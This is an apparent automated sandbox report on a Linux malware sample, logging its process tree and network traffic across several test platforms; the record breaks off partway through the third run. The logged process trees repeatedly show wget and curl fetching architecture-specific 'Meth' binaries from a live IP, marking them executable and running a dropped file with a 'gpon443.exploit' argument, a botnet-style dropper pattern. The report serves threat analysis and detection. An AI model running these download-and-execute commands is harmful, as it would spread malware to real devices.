Analysis Overview
SHA256
d3e494fd077267d03723741a3278cd232b9aeea49533f4d218f3669a049be23f
Threat Level: Shows suspicious behavior
The file 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-28 03:58
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-28 03:58
Reported
2024-07-29 11:33
Platform
debian9-mipsel-20240729-en
Max time kernel
77s
Max time network
78s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sn0rt | /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 | N/A |
Processes
/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/bin/cat
[cat Meth.x86]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/bin/cat
[cat Meth.mips]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/bin/cat
[cat Meth.mpsl]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/bin/cat
[cat Meth.arm]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/bin/cat
[cat Meth.arm5]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/bin/cat
[cat Meth.arm6]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/bin/cat
[cat Meth.arm7]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/bin/cat
[cat Meth.ppc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/bin/cat
[cat Meth.m68k]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/bin/cat
[cat Meth.spc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/bin/cat
[cat Meth.i686]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/bin/cat
[cat Meth.sh4]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/bin/cat
[cat Meth.arc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-28 03:58
Reported
2024-07-29 11:33
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
79s
Max time network
128s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sn0rt | /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 | N/A |
Processes
/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/bin/cat
[cat Meth.x86]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/bin/cat
[cat Meth.mips]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/bin/cat
[cat Meth.mpsl]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/bin/cat
[cat Meth.arm]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/bin/cat
[cat Meth.arm5]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/bin/cat
[cat Meth.arm6]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/bin/cat
[cat Meth.arm7]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/bin/cat
[cat Meth.ppc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/bin/cat
[cat Meth.m68k]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/bin/cat
[cat Meth.spc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/bin/cat
[cat Meth.i686]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/bin/cat
[cat Meth.sh4]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/bin/cat
[cat Meth.arc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 89.187.167.38:443 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-28 03:58
Reported
2024-07-29 11:33
Platform
debian9-armhf-20240729-en
Max time kernel
78s
Max time network
79s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sn0rt | /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 | N/A |
Processes
/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/bin/cat
[cat Meth.x86]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/bin/cat
[cat Meth.mips]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/bin/cat
[cat Meth.mpsl]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/bin/cat
[cat Meth.arm]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/bin/cat
[cat Meth.arm5]
/bin/chmod
